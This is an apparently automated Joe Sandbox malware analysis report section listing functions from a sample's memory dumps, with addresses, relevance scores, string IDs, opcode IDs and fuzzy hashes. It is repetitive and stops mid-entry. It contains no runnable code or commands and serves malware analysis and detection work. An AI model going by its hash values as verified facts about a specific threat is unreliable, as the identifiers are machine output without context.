                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: "
                                                                                                                    • API String ID: 0-123907689
                                                                                                                    • Opcode ID: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                                    • Instruction ID: 5e798943979a28e72c4af1152a11b066526201169acef49fee75b2a8297e64d7
                                                                                                                    • Opcode Fuzzy Hash: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                                    • Instruction Fuzzy Hash: CBF15771A083616FC728CE24D490A7BBBE6AFE5310F18C56DE88987382D734DD15C792
                                                                                                                    Function 0011AE57 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 9b430b6eabcb973455100258b33d0e284e6fcb25a0a0b57c5e52ffd925524971
                                                                                                                    • Instruction ID: 0687d20d49b9841f0ef519e088980bb7a8f2a247e530eba681a838fa6839cadf
                                                                                                                    • Opcode Fuzzy Hash: 9b430b6eabcb973455100258b33d0e284e6fcb25a0a0b57c5e52ffd925524971
                                                                                                                    • Instruction Fuzzy Hash: 60E1987550C306DBC328DF28C8905AEB7F2FF99791F55892CE4D587220E335A999CB82
                                                                                                                    Function 00106EBF Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 59b6d09e57590d6ea46eb15cd8fabe2b27aebc67be2552177a0f00bc8c9b4193
                                                                                                                    • Instruction ID: deb4027cad5a9be2601072c8af4555a99bd49c72dacefc86bd6dfd095fd39bec
                                                                                                                    • Opcode Fuzzy Hash: 59b6d09e57590d6ea46eb15cd8fabe2b27aebc67be2552177a0f00bc8c9b4193
                                                                                                                    • Instruction Fuzzy Hash: 31F1DFB5A00B05CFD724DF24D891A26B3F2FF48314B148A2DE58787A92EB74F865CB41
                                                                                                                    Function 00117E60 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 12146cba6b7c53cd1e94b28dd69c5d968c2a484e87564f6b03d23b490e7a7e72
                                                                                                                    • Instruction ID: 0a1e915e9559274bb83158bb1191897822328d8bb97cc50e04b8de77e5f8d244
                                                                                                                    • Opcode Fuzzy Hash: 12146cba6b7c53cd1e94b28dd69c5d968c2a484e87564f6b03d23b490e7a7e72
                                                                                                                    • Instruction Fuzzy Hash: C3C1C172508200AFD715EB14C882AABB7F5EF96754F088828F8C587391E734EC95DB63
                                                                                                                    Function 00118D62 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: db7a622615356db7ab0c3f46e01bc7e030ad0d8a7e51cc8ef222bf41cf0cfca9
                                                                                                                    • Instruction ID: c3e640b1016ff135acec2f39b73e64e4ccfd0db7ad169116801dad075904d366
                                                                                                                    • Opcode Fuzzy Hash: db7a622615356db7ab0c3f46e01bc7e030ad0d8a7e51cc8ef222bf41cf0cfca9
                                                                                                                    • Instruction Fuzzy Hash: 17D1F174A18302DFD708DFA5DC9066AB7E6FF8A304F49887CE98687261D734E884CB51
                                                                                                                    Function 00137FC0 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 0-3110715001
                                                                                                                    • Opcode ID: cac0be5191871caf0baecf19013f7ceb1aa390e90665098f18124fcd2901efeb
                                                                                                                    • Instruction ID: 9787b7d5fc6dd9897bdb8b79df764903c712307142358b6464d4ae85e53e010f
                                                                                                                    • Opcode Fuzzy Hash: cac0be5191871caf0baecf19013f7ceb1aa390e90665098f18124fcd2901efeb
                                                                                                                    • Instruction Fuzzy Hash: A8D1B3729083658FC725CF18A89072EB6E1EB85758F16862CF8A5AB391CB71DC46C7C1
                                                                                                                    Function 0011CCD0 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 2994545307-3233224373
                                                                                                                    • Opcode ID: 1b920fc90a2a34e1d5ad059a755c81c12be521a50fc8d5e6eaadbfaf8814445b
                                                                                                                    • Instruction ID: e6b554773f5947a8ec44ee785ea9c1942668f242f0d8234fc48b422995768c98
                                                                                                                    • Opcode Fuzzy Hash: 1b920fc90a2a34e1d5ad059a755c81c12be521a50fc8d5e6eaadbfaf8814445b
                                                                                                                    • Instruction Fuzzy Hash: D5B100706093059BD718DF54E890ABBBBE2EF95340F14493CE5C58B252E335E895CBD2
                                                                                                                    Function 000FA850 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,
                                                                                                                    • API String ID: 0-3772416878
                                                                                                                    • Opcode ID: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                                    • Instruction ID: 52563de69c7afbadbbf0872675d4ad5a1cab6db5460125b2e968f83585486ed6
                                                                                                                    • Opcode Fuzzy Hash: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                                    • Instruction Fuzzy Hash: C0B1397020C3859FD324CF58C89062BBBE1AFAA704F448A2DF5D997742D671EA18CB57
                                                                                                                    Function 0012FC20 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 16ba37dec9c8d93783b1acd65cb5163d654b7521133c002f8437f0624895bce3
                                                                                                                    • Instruction ID: 8e954cdd8d8418d2bf6ca7c86ec1d771e5b31feb67eed37f7f3309ad623351d4
                                                                                                                    • Opcode Fuzzy Hash: 16ba37dec9c8d93783b1acd65cb5163d654b7521133c002f8437f0624895bce3
                                                                                                                    • Instruction Fuzzy Hash: F981CC75508314AFD714DF64E884B2AB7F6FB9AB41F84883CF58487262D730D866CB62
                                                                                                                    Function 0010D457 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: de1d08536bec82318e47e9bf12d3714cac96bb6d67712acf3f715a86e1c23bbc
                                                                                                                    • Instruction ID: d7161c0e1750084f9f04863d0ba7e84e6d45e4d7ecf926c9f4dac94307946981
                                                                                                                    • Opcode Fuzzy Hash: de1d08536bec82318e47e9bf12d3714cac96bb6d67712acf3f715a86e1c23bbc
                                                                                                                    • Instruction Fuzzy Hash: 5B61E275908204DBD711EF58EC42A3AB3B1FF99754F080528F9C58B7A2E371E951C792
                                                                                                                    Function 00223EEC Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: "8c
                                                                                                                    • API String ID: 0-2939813517
                                                                                                                    • Opcode ID: f471e785aeb5ecdc165ce4ef51da9a627da6c86df55f1675cdb2da9ca557c4a8
                                                                                                                    • Instruction ID: 05a7cb3900f740c3f60e9f33211af871591b4638d2611c0bb4b522ae9808a555
                                                                                                                    • Opcode Fuzzy Hash: f471e785aeb5ecdc165ce4ef51da9a627da6c86df55f1675cdb2da9ca557c4a8
                                                                                                                    • Instruction Fuzzy Hash: 007168B3A1D2009FE308AE3DDD4576ABBD6EBD4310F1A853CDAC483784E93999058796
                                                                                                                    Function 00134A40 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 1c80d64527b8110f795c444cf6eb921ba544d5e56e91d869854a955fb13a181b
                                                                                                                    • Instruction ID: 589e6c8f4f3bbd1ee577524a0ac4b25bad69b27e2866bfcb0dbeeb112c79f16e
                                                                                                                    • Opcode Fuzzy Hash: 1c80d64527b8110f795c444cf6eb921ba544d5e56e91d869854a955fb13a181b
                                                                                                                    • Instruction Fuzzy Hash: 8061DE756083419BE724DF25D880B2AFBE6EB85315F58892CE9C9872A5D731FC40CB52
                                                                                                                    Function 0024DD60 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 'U_n
                                                                                                                    • API String ID: 0-3791628548
                                                                                                                    • Opcode ID: c57fe2a9604c046cd65b05ac762fefb3e7a8c899ab465fe1f6e24a6954a06c0e
                                                                                                                    • Instruction ID: 5547337c38e881118c93654d930d4cd971591723a961a6f63495c69860d0f67a
                                                                                                                    • Opcode Fuzzy Hash: c57fe2a9604c046cd65b05ac762fefb3e7a8c899ab465fe1f6e24a6954a06c0e
                                                                                                                    • Instruction Fuzzy Hash: 185156B3A182145BE318192DEC457BBB7DAEBD1370F1B423EDA9897780DD3A1C018695
                                                                                                                    Function 0020ED9D Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
